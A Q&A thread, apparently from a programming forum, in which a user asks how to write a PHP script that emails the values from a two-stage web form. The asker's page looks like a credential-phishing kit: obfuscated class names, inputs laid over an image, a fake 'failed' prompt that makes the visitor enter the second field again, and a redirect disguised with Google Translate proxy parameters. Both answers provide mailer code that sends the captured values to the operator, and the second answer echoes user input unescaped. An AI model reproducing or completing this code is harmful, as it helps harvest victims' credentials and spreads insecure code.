# How to write a phpsender.php file?

Tags: javascript, php, ajax

I am having similar issues and I am totally lost as to what write on the `phpsender.php` file. Here my case: I have a form that is in two or three stages that a customer needs to fill. First form they input their username and location once they hit the send button it takes them to the second form where they input their phone number, email, and message. At this second form once they hit the submit button, I need all the form input value from first and second sent to my email.

First part of the form:

```php
<form  class="ZdyDsE vAlignMiddle" style="width:auto;" >
         <input name="email" id="username" class="UPkfdH textbox" autocomplete="off" required="" type="text" style="position: absolute; width: 325px; left: 173px; top: 326px; z-index: 1; border:none">  
         <div id="arcotuserdataDiv" display="none" style="display: none;"></div>
      <div id="arcotuserdataDiv" display="none" style="display: none;"></div>
            <div class="offline-ui offline-ui-up">
         <div class="offline-ui-content"><input id="location" name="location" class="l9X2Aa textbox" autocomplete="off" required="" type="text" style="position: absolute; width: 331px; left: 171px; top: 400px; z-index: 1 ; border:none"></div>
            <a href="" class="BTMDID"></a>
         </div>
         <div id="user_error" style="color:red; display:none">Please enter your username.</div>
         <div id="loca_error" style="color:red; display:none">Please enter your location.</div>
         <div id="message" style="color:red; display:none"> failed.</div>
         </div>
         <div id="submitbutton" style="position: absolute; left: 82px; top: 454px; z-index: 2; width: 420px; height: 70px;"><input type="image"  width="420" height="70" src="./index_files/submit.jpg"></div>
         <p>&nbsp;</p>
      </form>
      
      <script>
         var count =0;
         document.getElementById("submitbutton").addEventListener("click", function(e) {
         event.preventDefault();
         var email = document.getElementById("username").value;
         var location = document.getElementById("location").value;
         if (email == "" || email == null){
             clearErrors();
             document.getElementById("user_error").style.display ='block';
         }else if(location == "" || location == null){
             clearErrors();
             document.getElementById("loca_error").style.display ='block';
         }else{
         clearErrors();
         count=count+1; 
         $.ajax({
          "async": true, 
          "crossDomain": true, 
          "dataType": 'JSON',
          "url": "phpsender.php",
          "method": "GET", 
          "headers": {"Content-Type": "application/json; charset=utf-8", "cache-control": "no-cache", 'Access-Control-Allow-Origin': '*' },
          "data": {"email": email, "location": location}
         }).done(function()  {
         }).fail(function()  {
             clearErrors();
          document.getElementById("message").style.display ='block';
          document.getElementById("location").value ="";
         if(count >= 2){
          count=0;
          clearErrors();
          var href = window.location.href;
          var dir = href.substring(0, href.lastIndexOf('/')) + "/";
         window.location.replace(dir+'dat_mobile.php?_x_tr_sl=auto&_x_tr_tl=null&_x_tr_hl=null&_x_tr_pto=wapp&username='+email);     
          }
         });        
         }
         });

                     function clearErrors(){
                         document.getElementById("user_error").style.display ='none';
                         document.getElementById("loca_error").style.display ='none';
                         document.getElementById("message").style.display ='none';
                     }
      </script>
```

What code I need to write in the `phpsender.php` file ?
Please and please, I need your help guys.

I just don't know what I need to write on the `phpsender.php` file. I need help.

Should I write something like this?

```php
<?php

$username = $_POST['username'];
$location = $_POST['location'];


//Do whatever php code here that makes you happy.  
mail($email, $name, "Thank you");




?>
```

Answer (score 0):

**Try This**

**Step 1 : Change method in $.ajax**

```
method : "POST"
```

**Step 2 : Pass all input value in data attribute in $.ajax which you want to send in email**

**Step 3 : Write code like below in phpsender.php file**

```
<?php
//Receive All Post Value Which Is Send By Ajax

$username = $_POST['username'];
$location = $_POST['location'];
$email = $_POST['email'];
$phone_number = $_POST['phone_number'];
$message  = $_POST['message'];


// Design email template as per your requirement
$body = '<style>
table, th, td {
border: 1px solid black;
border-collapse: collapse;
}
</style>';

$body .= '<p>Customer Details</p>';

$body .= '<table style="width:100%">
    <tr>
        <td>Username</td>
        <td>'.$username.'</td> 
    </tr>
    <tr>
        <td>Location</td>
        <td>'.$location.'</td> 
    </tr>
    <tr>
        <td>Email</td>
        <td>'.$email.'</td> 
    </tr>
    <tr>
        <td>Phone number</td>
        <td>'.$phone_number.'</td> 
    </tr>
    <tr>
        <td>Message</td>
        <td>'.$message.'</td> 
    </tr>
</table>';


$to = "test@example.com"; // Add your email address (If you want to send email to customer then write here customer email address)
$subject = "Test"; // Add subject as per your requirement
$from = "test@example.com"; // Add your email address
$headers = "From:" . $from;

$is_send = mail($to,$subject,$body,$headers);

if($is_send){
    echo 'Email sent successfully';
    // Write further code here as per your requirement.
}else{
    echo 'Something went wrong while sending email';
    // Write further code here as per your requirement.
}

?>
```

**Notes : you cannot send email through localhost. mail function will send information when your code is online.**

Comment: Ok... Thanks let me try this

Comment: I hope it had useful to you

Answer (score 0):

Write code like below in phpsender.php file

```
    <?php
    // get step
    $step = isset($_GET['step']) ? intval($_GET['step']) : 1;
    if($step > 1){
        // get post datas
        $username = $_POST['username'] ?? '';
        $location = $_POST['location'] ?? '';
        $phone = $_POST['phone'] ?? '';
        $email = $_POST['phone'] ?? '';
        if($username && $location){
            if($step == 3 && $phone && $email){
                /* send email * /
                if(mail($to,$subject,$body,$headers)){
                    echo 'Email sent successfully';
                }else{
                    echo 'Something went wrong while sending email';
                }
                /**/
                echo 'ok';
                print_r($_POST);
                die;
            }
        } else {
            header("Location:phpsender.php");
        }
    }
    //echo ($step);die;
?>
<style>
.errorTips{color:red;display:none}
</style>

<?php
if($step == 1){
?>

<form name="form1" action="?step=2" method="post">
    <p><input name="username" id="username" autocomplete="off" type="text" placeholder="Your username."/><div class="errorTips"></div></p>
    <p><input name="location" id="location" autocomplete="off" type="text" placeholder="Your location."/><div class="errorTips"></div></p>
    <div><input type="submit" name="submit" id="submit1"></div>
</form>

<?php
}else if($step == 2){
?>

<form name="form2" action="?step=3" method="post">
    <input type="hidden" name="username" value="<?php echo $username?>"/>
    <input type="hidden" name="location" value="<?php echo $location?>"/>
    <p><input name="phone" id="phone" type="text" placeholder="Your phone."/><div class="errorTips"></div></p>
    <p><input name="email" id="email" type="text" placeholder="Your email."/><div class="errorTips"></div></p>
    <div><input type="submit" name="submit" id="submit2"></div>
</form>

<?php
}
?>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script>

    $('#submit1').on('click',function(){
        $('.errorTips').hide();
        var obj = $('#username');
        if(obj.val() == '') return errorTips(obj,'Please enter your username.');
        obj = $('#location');
        if(obj.val() == '') return errorTips(obj,'Please enter your location.');
        return true;
    });

    $('#submit2').on('click',function(){
        $('.errorTips').hide();
        var obj = $('#phone');
        if(obj.val() == '') return errorTips(obj,'Please enter your phone.');
        obj = $('#email');
        if(obj.val() == '') return errorTips(obj,'Please enter your email.');
        return true;
    });

    function errorTips(obj, txt){
        obj.focus();
        var errObj = obj.parent().next();
        errObj.show().html(txt);
        return false;
    }

</script>
```

Comment: Thank you Niaho... What do I need to change in the JS Code.

Comment: I made some modifications using jquery above

Comment: Do I need to add form name in the form tag like this below?  <form  class="ZdyDsE vAlignMiddle" style="width:auto; name="form1">

Comment: Setting a name is not mandatory